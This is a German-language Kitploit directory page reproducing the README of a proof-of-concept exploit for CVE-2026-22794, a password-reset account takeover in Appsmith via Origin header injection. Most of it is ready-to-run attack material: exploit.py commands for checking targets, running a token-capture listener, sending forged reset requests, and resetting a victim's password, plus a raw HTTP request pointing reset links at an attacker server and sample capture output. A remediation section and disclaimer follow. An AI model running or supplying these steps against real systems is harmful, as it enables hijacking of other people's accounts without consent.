Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-22794-POC — 🔴 CVE-2026-22794 - Appsmith Passwort-Reset-Kontoübernahme durch Origin-Header-Injection | PoC-Exploit + Nuclei-Template | Kitploit
Tools/GitHubGitHub/malikhamza7/cve-2026-22794-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsAuthentifizierung
GitHubmalikhamza7/cve-2026-22794-poc

CVE-2026-22794-POC

🔴 CVE-2026-22794 - Appsmith Passwort-Reset-Kontoübernahme durch Origin-Header-Injection | PoC-Exploit + Nuclei-Template

Repository anzeigen
7vor 7 MonatenNoch nicht geprüft
Webseite

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-22794 - Appsmith Origin Header Injection

Python Version CVE License

🔴 Kritische Sicherheitslücke

Passwort-Reset-Link-Übernahme durch Manipulation des Origin-Headers

Dieses Repository enthält einen Proof of Concept (PoC)-Exploit für CVE-2026-22794, eine kritische Schwachstelle in Appsmith, die es Angreifern ermöglicht, Passwort-Reset-Tokens zu übernehmen und eine vollständige Kontenübernahme zu erreichen.

📋 Zusammenfassung der Schwachstelle

FeldWert
CVE-IDCVE-2026-22794
Betroffene SoftwareAppsmith (Versionen vor dem Patch)
SchwachstellentypOrigin-Header-Injection
AuswirkungVollständige Kontenübernahme
CVSS-Score9.1 (Kritisch)
AngriffsvektorNetzwerk
AngriffskomplexitätNiedrig
Erforderliche BerechtigungenKeine
BenutzerinteraktionErforderlich (Opfer klickt auf Link)

🎯 Beschreibung der Schwachstelle

Appsmith verwendet den HTTP-Origin-Header ohne Validierung, um URLs für Passwort-Reset und E-Mail-Verifizierung zu erstellen. Der anfällige Code weist den Origin-Header direkt der Basis-URL für den Passwort-Reset zu:

root@kitploit:~
userPasswordDTO.setBaseUrl(originHeader);

Dies ermöglicht einem Angreifer:

  1. Einen Passwort-Reset für eine beliebige E-Mail-Adresse auszulösen
  2. Einen bösartigen Origin-Header zu injizieren, der auf einen vom Angreifer kontrollierten Server verweist
  3. Das Passwort-Reset-Token zu erfassen, wenn das Opfer auf den Link klickt
  4. Das Token zu verwenden, um das Passwort des Opfers zurückzusetzen und dessen Konto zu übernehmen

🔥 Angriffskette

root@kitploit:~
┌─────────────────────────────────────────────────────────────────┐
│                     ANGRIFFSABLAUF                               │
└─────────────────────────────────────────────────────────────────┘

  ┌──────────┐                    ┌──────────┐                    ┌──────────┐
  │ ANGREIFER│                    │ APPSMITH │                    │  OPFER   │
  └────┬─────┘                    └────┬─────┘                    └────┬─────┘
       │                               │                               │
       │ 1. POST /forgotPassword       │                               │
       │    Origin: attacker.com       │                               │
       │    email: [email protected]     │                               │
       │──────────────────────────────>│                               │
       │                               │                               │
       │                               │ 2. E-Mail mit                 │
       │                               │    attacker.com/reset?token   │
       │                               │──────────────────────────────>│
       │                               │                               │
       │ 3. Opfer klickt auf Link      │                               │
       │<──────────────────────────────────────────────────────────────│
       │                               │                               │
       │ 4. Token erfasst!             │                               │
       │                               │                               │
       │ 5. POST /resetPassword        │                               │
       │    token: GESTOHLENES_TOKEN   │                               │
       │    password: attacker123      │                               │
       │──────────────────────────────>│                               │
       │                               │                               │
       │ 6. KONTENÜBERNAHME! ✓         │                               │
       │                               │                               │

📦 Installation

root@kitploit:~
# Repository klonen
git clone https://github.com/MalikHamza7/CVE-2026-22794-POC
cd CVE-2026-22794-POC

# Abhängigkeiten installieren
pip install -r requirements.txt

🚀 Verwendung

Prüfen, ob das Ziel verwundbar ist

root@kitploit:~
python exploit.py --target https://appsmith.target.com --check

Token-Erfassungsserver starten

root@kitploit:~
python exploit.py --listen --port 8080

Bösartige Passwort-Reset-Anfrage senden

root@kitploit:~
python exploit.py \
    --target https://appsmith.target.com \
    --email [email protected] \
    --attacker-url https://your-server.com

Vollständiger automatisierter Angriff

root@kitploit:~
python exploit.py \
    --target https://appsmith.target.com \
    --email [email protected] \
    --attacker-url https://your-server.com \
    --listen --port 8080

Erfasstes Token zum Zurücksetzen des Passworts verwenden

root@kitploit:~
python exploit.py \
    --target https://appsmith.target.com \
    --reset-token CAPTURED_TOKEN \
    --new-password "NewP@ssw0rd!"

📸 Angriffsdemonstration

Schritt 1: Angreifer sendet bösartige Anfrage

root@kitploit:~
POST /api/v1/users/forgotPassword HTTP/1.1
Host: appsmith.target.com
Origin: https://attacker-server.com
Content-Type: application/json

{
  "email": "[email protected]"
}

Schritt 2: Opfer erhält E-Mail mit bösartigem Link

root@kitploit:~
Passwort-Reset-Link: https://attacker-server.com/user/resetPassword?token=abc123xyz...

Schritt 3: Angreifer erfasst Token

root@kitploit:~
[+] EINGEHENDE ANFRAGE ERFASST!
[*] Pfad: /user/resetPassword?token=abc123xyz789...
[!!!] PASSWORT-RESET-TOKEN ERFASST!
[!!!] Token: abc123xyz789...

Schritt 4: Kontenübernahme

root@kitploit:~
[+] KONTENÜBERNAHME ERFOLGREICH!
[+] Passwort wurde zurückgesetzt auf: NewP@ssw0rd!

🛡️ Behebung

Organisationen, die Appsmith verwenden, sollten:

  1. Sofort aktualisieren auf die neueste gepatchte Version
  2. Origin-Header validieren gegen eine Whitelist zulässiger Domains
  3. Serverseitige Konfiguration für die Generierung von Passwort-Reset-URLs verwenden
  4. Zusätzliche Verifizierung implementieren (z. B. IP-Validierung, kurze Token-Ablaufzeit)

Beispiel für sicheren Code

root@kitploit:~
// ❌ VERWUNDBARER CODE
userPasswordDTO.setBaseUrl(originHeader);

// ✅ SICHERER CODE
String configuredBaseUrl = applicationConfiguration.getBaseUrl();
// Oder gegen Whitelist validieren
if (!allowedOrigins.contains(originHeader)) {
    throw new InvalidOriginException("Ungültiger Origin-Header");
}
userPasswordDTO.setBaseUrl(configuredBaseUrl);

📁 Repository-Struktur

root@kitploit:~
CVE-2026-22794/
├── README.md           # Diese Datei
├── exploit.py          # Haupt-Exploit-Skript
├── requirements.txt    # Python-Abhängigkeiten
├── LICENSE             # MIT-Lizenz
└── docs/
    └── technical_analysis.md  # Detaillierte Schwachstellenanalyse

⚠️ Rechtlicher Haftungsausschluss

Dieses Tool wird nur für autorisierte Sicherheitstests und Bildungszwecke bereitgestellt.

  • Verwenden Sie dieses Tool nur gegen Systeme, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben
  • Unbefugter Zugriff auf Computersysteme ist illegal
  • Der Autor ist nicht verantwortlich für jeglichen Missbrauch dieses Tools
  • Befolgen Sie stets verantwortungsvolle Offenlegungspraktiken

📄 Referenzen

  • CVE-2026-22794
  • OWASP - Forgot Password Cheat Sheet
  • CWE-346: Origin Validation Error

👤 Autor

Sicherheitsforscher

  • GitHub: @MalikHamza7
  • LinkedIn: Ihr LinkedIn-Profil

📜 Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die Datei LICENSE für Details.


⭐ Wenn Sie dies nützlich fanden, bitte markieren Sie das Repository mit einem Stern! ⭐

Tool herunterladen